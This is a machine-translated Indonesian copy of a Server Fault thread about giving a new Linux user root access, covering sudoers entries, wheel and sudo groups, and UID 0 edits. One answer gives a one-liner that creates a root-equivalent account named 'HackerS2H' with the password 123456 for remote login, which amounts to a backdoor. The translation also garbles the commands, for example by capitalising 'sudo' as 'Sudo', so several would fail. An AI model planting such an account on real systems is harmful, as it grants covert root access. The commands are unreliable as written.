pengembangan-web-mp-pd.com

tambahkan pengguna baru dengan akses root di Linux

Saya ingin menambahkan pengguna baru dan memiliki/memberikan pengguna baru itu untuk memiliki semua akses root, bagaimana saya bisa melakukan itu?

Aku melakukannya Sudo adduser --system testuser tapi ini tidak berfungsi seperti yang saya harapkan.

Terimakasih atas bantuannya.

31
seg.server.fault

Sebenarnya ada tiga cara Anda bisa melakukan ini: cara yang benar, cara yang salah, dan cara yang jelek.

Pertama, buat normal akun pengguna.

adduser username

Kemudian pilih salah satu dari yang berikut:


Jalan yang benar

Buat entri Sudo untuk grup wheel di /etc/sudoers seperti ini:

## Allows people in group wheel to run all commands
%wheel  ALL=(ALL)       ALL

Atau untuk versi "modern":

## Allows people in group sudoers to run all commands
%sudoers ALL=(ALL)       ALL

Kemudian tambahkan pengguna ke grup wheel. Menambah dan menghapus pengguna dengan hak administratif sekarang menjadi fungsi mengingat untuk menambahkan mereka ke roda, alih-alih membuat entri di Sudo. Hal yang hebat tentang menggunakan roda adalah Anda dapat memperluas mekanisme ini ke skema otentikasi lain yang mendukung grup, mis. Winbind/Active Directory, dan menuai manfaat dalam proses tersebut. Anda akan melakukannya dengan memetakan roda ke grup dalam skema otentikasi Anda yang memiliki hak admin.

Perhatikan bahwa beberapa distribusi menggunakan akun administratif yang berbeda. Wheel adalah pendekatan "tradisional" untuk ini, tetapi Anda mungkin menemukan admin, adm, dan akun grup lainnya yang memiliki tujuan yang sama.

Edit Tindak Lanjut:

Saya harus memberikan poin kepada Bart Silverstrim untuk menunjukkan bahwa Ubuntu menggunakan admin sebagai grup untuk tujuan ini. Dia melakukan ini dulu, meskipun saya tidak melihat tag Ubuntu pada saat itu. Sekali lagi, semuanya tergantung pada distribusi apa yang Anda gunakan.


Jalan Jelek

Buat entri Sudo untuk akun pengguna yang bersangkutan dan berikan kemudian akses lengkap. Sekali lagi, Anda membuat entri di /etc/sudoers seperti ini:

## Allows just user "username" to run all commands as root
username    ALL=(ALL)    ALL

TAMBAH: ## Untuk versi Ubuntu: username ALL = (ALL: ALL)

Ini bagus jika Anda hanya memiliki satu (atau dua) akun normal. Ini buruk ketika Anda memiliki seratus akun lebih dari beberapa situs (geofisika) dan harus terus memelihara file Sudo.


Jalan yang salah

Anda dapat mengedit /etc/passwd file dan ubah ID akun pengguna dari nomor berapapun, menjadi 0. Benar, nol.

username:x:0:502::/home/username:/bin/bash

Lihat entri ketiga sebagai nol? Ketika Anda masuk ke akun itu, Anda, untuk semua tujuan yang efektif, root. Saya tidak merekomendasikan ini. Jika Anda tidak ingat "siapa" Anda, Anda dapat membuat semua jenis kekacauan saat Anda mulai membuat dan menyentuh file sebagai root. Anda juga dapat menambahkan nama pengguna Anda ke grup root. Ini memiliki efek yang sama untuk akses file tetapi menciptakan masalah lain; program akan melihat Anda bukan penggunaroot dan menolak untuk menjalankan, tetapi Anda akan mendapatkan akses ke file yang milik gruproot.

Jika Anda melakukan ini, Anda memang menggunakan vipw bukan hanya mengedit dengan vi, kan? (atau apa pun editor teks favorit Anda) Bagaimanapun, satu kesalahan ketik pada file ini dapat mengunci Anda dari sistem Anda - dan itu berarti kunjungan fisik ke komputer yang bersangkutan dengan disk perbaikan ...

62
Avery Payne

Saya telah menggunakan ini selama bertahun-tahun dan ini adalah # 1 cara yang disarankan untuk menambahkan sudoer di AskUbunt :

adduser existinguser Sudo

Jauh lebih sederhana daripada mengedit file, dan mudah untuk memasukkan skrip Shell untuk instalasi tanpa pengawasan.

Jika Anda ingin membuat pengguna dan memberikan hak istimewa Sudo, Anda dapat melakukannya dalam satu baris seperti ini:

useradd newuser -m -G Sudo
passwd newuser

-m membuat direktori home, dan -G menentukan kelompok pelengkap.

3
Dan Dascalescu

dan dengan ini 100%:

adduser -u 0 -g root -G root -s /bin/bash -r HackerS2H -p 123456

dan terhubung dengan Putty dan ip server

2
hacker-s2h

Baik Anda dapat membuat pengguna dengan adduser, lihat man adduser.
Setelah itu Anda dapat menambahkannya ke grup istimewa seperti root, atau wheel. Tapi saya pikir cara yang paling direkomendasikan untuk memiliki izin adalah menggunakan Sudo.

1
Ali Mezgani

anda dapat melakukan:

#useradd -m -g root alex

itu membuat pengguna Alex dengan direktori home yang milik grup root

1
Razique

Tambahan untuk jawaban Avery Payne: di Ubuntu, Anda mungkin menginginkannya seperti:

%Sudo   ALL=(ALL:ALL) ALL

Dan tidak seperti itu:

%Sudo    ALL=(ALL) ALL
1
hukeping

Cara "jelek dan berantakan" adalah mengedit/etc/passwd untuk memiliki UID = 0 DAN GID = 0 untuk pengguna baru. Tetapi ini menimbulkan BANYAK risiko keamanan . Anda tahu bahwa jika ia juga root, ia dapat menonaktifkan accont Anda, ubah kata sandi Anda, jadikan Anda "pengguna standar" ... benar? jadi mengapa tidak memberi dia akun Anda sendiri?

Anda dapat mempelajari cara suid ( http://en.wikipedia.org/wiki/Setuid ) berfungsi jika Anda ingin memberinya akses root untuk hanya beberapa perintah.

0
quamis